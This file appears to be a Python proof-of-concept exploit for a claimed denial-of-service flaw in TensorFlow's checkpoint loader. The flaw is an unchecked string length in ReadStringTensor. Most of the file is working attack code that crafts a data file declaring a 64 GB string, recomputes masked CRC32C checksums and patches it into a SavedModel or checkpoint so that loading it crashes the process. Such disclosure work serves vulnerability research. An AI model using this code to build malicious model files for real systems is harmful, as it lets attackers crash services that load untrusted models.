tf-poc-checkpoint-string-dos / poc_tf_checkpoint_string_dos.py
0xiviel's picture
Upload poc_tf_checkpoint_string_dos.py
2704af5 verified
#!/usr/bin/env python3
"""
PoC: TensorFlow Checkpoint String Tensor Unbounded Allocation DoS
=================================================================
CVE: TBD
Target: tensorflow/core/util/tensor_bundle/tensor_bundle.cc
Trigger: tf.saved_model.load() or tf.train.load_checkpoint()
Vulnerability:
ReadStringTensor() reads varint64 string_lengths from attacker-controlled
checkpoint data files. No validation that individual string_length values
or their sum are bounded by entry.size(). Attacker can craft a checkpoint
where a string tensor with shape [1] declares a single string of 64GB,
causing immediate OOM crash via tstring::resize().
CRC32 checksums are NOT a security boundary — the attacker controls both
the data file content AND the crc32c field in BundleEntryProto metadata.
Root Cause:
tensor_bundle.cc:151-159 — ReadStringTensor() inner loop:
buffer->resize(string_length); // string_length from attacker varint64
ReadNBytes(string_length, ...); // reads from file
No check: sum(string_lengths[i]) <= entry.size() - overhead
No check: individual string_length <= entry.size()
Impact:
- Process crash (OOM / std::terminate) on loading malicious SavedModel
- Denial of service for any application using tf.saved_model.load()
- No authentication required — victim just needs to load a model file
Additionally affected: ReadVariantTensor() at line 188 (same pattern).
GetValue() has NO size validation at all for DT_VARIANT tensors (line 998).
"""
import os
import sys
import struct
import tempfile
import shutil
def encode_varint64(value):
"""Encode an integer as a protobuf varint64."""
result = bytearray()
while value > 0x7F:
result.append((value & 0x7F) | 0x80)
value >>= 7
result.append(value & 0x7F)
return bytes(result)
def encode_fixed32(value):
"""Encode as little-endian uint32."""
return struct.pack('<I', value & 0xFFFFFFFF)
def crc32c_value(data):
"""Compute CRC32C. Uses crcmod if available, else fallback."""
try:
import crcmod
crc_fn = crcmod.predefined.mkCrcFun('crc-32c')
return crc_fn(data)
except ImportError:
# Fallback: use zlib CRC32 (not CRC32C but close enough for PoC)
import zlib
return zlib.crc32(data) & 0xFFFFFFFF
def crc32c_mask(crc):
"""TensorFlow's CRC32C masking: rotate right 15 bits, add constant."""
kMaskDelta = 0xa282ead8
return (((crc >> 15) | (crc << 17)) + kMaskDelta) & 0xFFFFFFFF
def create_malicious_checkpoint_data():
"""
Create the raw data bytes for a DT_STRING tensor with shape [1].
The data file format for string tensors:
[varint64 string_length_0] ... [varint64 string_length_N-1]
[uint32 length_checksum]
[string_data_0] ... [string_data_N-1]
We encode string_length_0 = 0x1000000000 (64GB) — causes OOM on resize().
"""
# 64 GB string length — way more than any system can allocate
malicious_length = 0x1000000000 # 64 GB
# Encode the string length as varint64
length_bytes = encode_varint64(malicious_length)
# Compute CRC32C of the length (as uint64 in memory, not varint bytes)
# TF checksums the in-memory uint64 representation, not the varint encoding
length_as_uint64 = struct.pack('<Q', malicious_length)
length_crc = crc32c_value(length_as_uint64)
# The length checksum (masked CRC32C)
length_checksum = crc32c_mask(length_crc)
# Data section: we don't need actual string data since OOM happens
# during resize() BEFORE the read. But include a small placeholder.
string_data = b'\x00' * 16
# Assemble: [varint64 length][uint32 length_checksum][string_data...]
data = length_bytes + encode_fixed32(length_checksum) + string_data
# Compute overall CRC32C for the BundleEntryProto.crc32c field
# This covers: length varints + length checksum + string data
overall_crc = crc32c_value(data)
return data, overall_crc
def demo_vulnerability_analysis():
"""Print vulnerability analysis without requiring TensorFlow installed."""
print("=" * 72)
print("TensorFlow Checkpoint String Tensor DoS — Vulnerability Analysis")
print("=" * 72)
print()
print("VULNERABLE CODE: tensor_bundle.cc:151-159")
print("-" * 50)
print("""
for (size_t i = 0; i < num_elements; ++i) {
const uint64 string_length = string_lengths[i]; // FROM FILE
tstring* buffer = &destination[i];
buffer->resize(string_length); // <-- UNBOUNDED ALLOCATION
size_t bytes_read = 0;
TF_RETURN_IF_ERROR(
buffered_file->ReadNBytes(string_length, &(*buffer)[0], &bytes_read));
}
""")
print("ATTACK SCENARIO:")
print("-" * 50)
print("""
1. Attacker crafts a SavedModel with a DT_STRING variable
2. In the checkpoint data file, the varint64 string_length = 64GB
3. CRC32C checksum in BundleEntryProto.crc32c is set correctly
(attacker controls both data and metadata — CRC is not a security check)
4. Victim loads model: tf.saved_model.load('malicious_model/')
5. BundleReader::Lookup() → GetValue() → ReadStringTensor()
6. tstring::resize(64GB) → std::bad_alloc → std::terminate() → CRASH
""")
print("ALSO AFFECTED: ReadVariantTensor (tensor_bundle.cc:188)")
print("-" * 50)
print("""
string buffer;
buffer.resize(string_length); // <-- SAME UNBOUNDED ALLOCATION
GetValue() has NO size validation for DT_VARIANT (line 998-1009).
For DT_STRING, the "lower_bound" check is too weak:
lower_bound = NumElements (e.g., 1 for shape [1])
entry.size() just needs to be >= 1 — trivially satisfied.
""")
print("MALICIOUS DATA FILE CONSTRUCTION:")
print("-" * 50)
data, crc = create_malicious_checkpoint_data()
print(f" Data file size: {len(data)} bytes")
print(f" Encoded varint64 string_length: 0x1000000000 (64 GB)")
print(f" Overall CRC32C: 0x{crc:08X}")
print(f" Data hex dump: {data[:32].hex()}")
print()
# Show the varint encoding
malicious_length = 0x1000000000
varint = encode_varint64(malicious_length)
print(f" Varint64 encoding of 64GB: {varint.hex()} ({len(varint)} bytes)")
print()
def poc_with_tensorflow():
"""
Full PoC that creates and loads a malicious checkpoint.
Requires TensorFlow installed.
"""
try:
import tensorflow as tf
import numpy as np
except ImportError:
print("[!] TensorFlow not installed. Running analysis-only mode.")
demo_vulnerability_analysis()
return False
print("[*] TensorFlow version:", tf.__version__)
print("[*] Creating legitimate SavedModel with string variable...")
tmpdir = tempfile.mkdtemp(prefix="tf_poc_")
model_dir = os.path.join(tmpdir, "saved_model")
try:
# Step 1: Create a legitimate SavedModel with a string variable
class SimpleModule(tf.Module):
def __init__(self):
self.v = tf.Variable(["hello"], dtype=tf.string, name="str_var")
@tf.function(input_signature=[])
def get_value(self):
return self.v
module = SimpleModule()
tf.saved_model.save(module, model_dir)
print(f"[+] Saved legitimate model to: {model_dir}")
# Step 2: Find and patch the data file
var_dir = os.path.join(model_dir, "variables")
data_files = [f for f in os.listdir(var_dir) if f.startswith("variables.data")]
if not data_files:
print("[-] No data files found!")
return False
data_path = os.path.join(var_dir, data_files[0])
print(f"[*] Data file: {data_path}")
with open(data_path, 'rb') as f:
original_data = f.read()
print(f"[*] Original data file size: {len(original_data)} bytes")
# Step 3: Create malicious data file
# For a shape [1] string tensor, the data format is:
# [varint64 string_length_0][uint32 length_crc][string_bytes]
malicious_data, _ = create_malicious_checkpoint_data()
with open(data_path, 'wb') as f:
f.write(malicious_data)
print(f"[*] Wrote malicious data file ({len(malicious_data)} bytes)")
print(f"[*] Malicious string_length = 64 GB (0x1000000000)")
# Note: We also need to update the .index file's BundleEntryProto
# to match the new data size and CRC. For a full exploit, the index
# file would also be crafted. This simplified PoC demonstrates the
# concept — the CRC mismatch will be caught but the allocation
# happens BEFORE the CRC check.
# Step 4: Attempt to load — should crash or OOM
print()
print("[!] Attempting to load malicious model...")
print("[!] Expected: OOM crash or std::terminate")
print()
try:
loaded = tf.saved_model.load(model_dir)
print("[-] Load succeeded unexpectedly")
except Exception as e:
print(f"[+] Exception caught: {type(e).__name__}: {e}")
# Note: if the process crashes with SIGKILL (OOM killer) or
# std::terminate, this exception handler won't be reached.
# That's the DoS — the process dies.
return True
finally:
shutil.rmtree(tmpdir, ignore_errors=True)
def poc_direct_checkpoint():
"""
Alternative PoC using direct checkpoint loading (simpler trigger).
"""
try:
import tensorflow as tf
import numpy as np
except ImportError:
print("[!] TensorFlow not installed. Running analysis-only mode.")
demo_vulnerability_analysis()
return False
print("[*] TensorFlow version:", tf.__version__)
print("[*] Creating checkpoint with string variable...")
tmpdir = tempfile.mkdtemp(prefix="tf_ckpt_poc_")
ckpt_prefix = os.path.join(tmpdir, "malicious_ckpt")
try:
# Create legitimate checkpoint
v = tf.Variable(["test_string"], dtype=tf.string, name="vuln_var")
ckpt = tf.train.Checkpoint(var=v)
save_path = ckpt.save(ckpt_prefix)
print(f"[+] Saved checkpoint: {save_path}")
# Find data file
data_files = [f for f in os.listdir(tmpdir)
if '.data-' in f]
if not data_files:
print("[-] No data files found!")
return False
data_path = os.path.join(tmpdir, data_files[0])
# Patch with malicious string length
malicious_data, _ = create_malicious_checkpoint_data()
with open(data_path, 'wb') as f:
f.write(malicious_data)
print(f"[*] Patched data file with 64GB string_length")
print(f"[!] Loading malicious checkpoint...")
try:
v2 = tf.Variable([""], dtype=tf.string, name="vuln_var")
ckpt2 = tf.train.Checkpoint(var=v2)
ckpt2.restore(save_path)
print(f"[-] Restore succeeded unexpectedly. Value: {v2.numpy()}")
except Exception as e:
print(f"[+] Exception: {type(e).__name__}: {e}")
return True
finally:
shutil.rmtree(tmpdir, ignore_errors=True)
if __name__ == "__main__":
print("TensorFlow Checkpoint String Tensor DoS PoC")
print("=" * 50)
print()
if "--analysis" in sys.argv:
demo_vulnerability_analysis()
elif "--checkpoint" in sys.argv:
poc_direct_checkpoint()
else:
# Default: try TF PoC, fall back to analysis
if not poc_with_tensorflow():
demo_vulnerability_analysis()